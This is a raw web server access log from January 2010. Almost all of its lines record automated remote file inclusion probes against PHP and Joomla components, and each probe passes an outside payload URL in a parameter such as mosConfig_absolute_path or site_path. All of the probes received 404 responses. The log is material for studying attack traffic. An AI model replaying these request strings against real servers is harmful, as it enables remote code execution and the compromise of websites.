74.223.143.131 - - [10/Jan/2010:23:59:31 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:31 -0800] "GET /logs/access.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:59:32 -0800] "GET /logs/access_090713.log/akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:48 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:48 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:49 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:49 -0800] "GET /logs/access.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:58 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:58 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:58 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:58 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:59 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:59 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:00:23 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:00:24 -0800] "GET /logs/access_090720.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:29 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:29 -0800] "GET /logs/access_091228.log%20%20/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:29 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:33 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:33 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:34 -0800] "GET /logs/access_091228.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:34 -0800] "GET /logs/access_091228.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:34 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:35 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:01:35 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:00:02:04 -0800] "GET /logs/access_090921.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:03:10 -0800] "GET /logs/access_090720.log%20%20/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.144 - - [11/Jan/2010:00:03:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:03:14 -0800] "GET /logs/access_090720.log%20%20/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.26.187.110 - - [11/Jan/2010:00:03:15 -0800] "GET /logs/access.log HTTP/1.0" 200 204709 "http://www.galf.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.galf.org"
209.151.70.1 - - [11/Jan/2010:00:06:23 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [11/Jan/2010:00:06:23 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:08:10 -0800] "GET /include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [11/Jan/2010:00:08:12 -0800] "GET /logs//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [11/Jan/2010:00:08:13 -0800] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.23.156.168 - - [11/Jan/2010:00:09:13 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:09:13 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:09:13 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:10:28 -0800] "GET /logs//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:10:28 -0800] "GET /logs/access_090629.log//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:10:30 -0800] "GET /include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:11:08 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:11:19 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:01 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:01 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:01 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:14 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:14 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:14 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:15 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:15 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:15 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:34 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:34 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:12:34 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:12:44 -0800] "GET /logs/access_090525.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:13:16 -0800] "GET /logs/access_090713.log//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:13:25 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:13:27 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:00:13:27 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:13:50 -0800] "GET /logs/access_090525.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.70.1 - - [11/Jan/2010:00:14:03 -0800] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [11/Jan/2010:00:14:03 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:11 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:11 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:14:15 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:14:16 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:14:17 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:17 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:14:35 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [11/Jan/2010:00:14:38 -0800] "GET /logs/access_090713.log//include/admin.lib.inc.php?site_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:15:08 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:15:08 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:15:08 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:16:06 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:16:08 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:00:16:14 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [11/Jan/2010:00:16:49 -0800] "GET /logs/access_090525.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:51 -0800] "GET /index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:51 -0800] "GET /logs/access_090921.log//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:51 -0800] "GET /logs//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:54 -0800] "GET /logs/access_090921.log//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:54 -0800] "GET /index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:54 -0800] "GET /logs//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:54 -0800] "GET /logs/access_091026.log//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:17:56 -0800] "GET /logs/access_091026.log//index.inc.php?PATH_Includes=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:22:08 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:22:08 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:22:08 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:22:10 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:22:29 -0800] "GET /logs/access_090525.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [11/Jan/2010:00:23:13 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:23:55 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:00:24:01 -0800] "GET /logs/access_090525.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:41 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:46 -0800] "GET /logs/access_090622.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:46 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:46 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:55 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:55 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:28:55 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:06 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:07 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:08 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:08 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:16 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:17 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:18 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:25 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:36 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:36 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:37 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:00:29:39 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
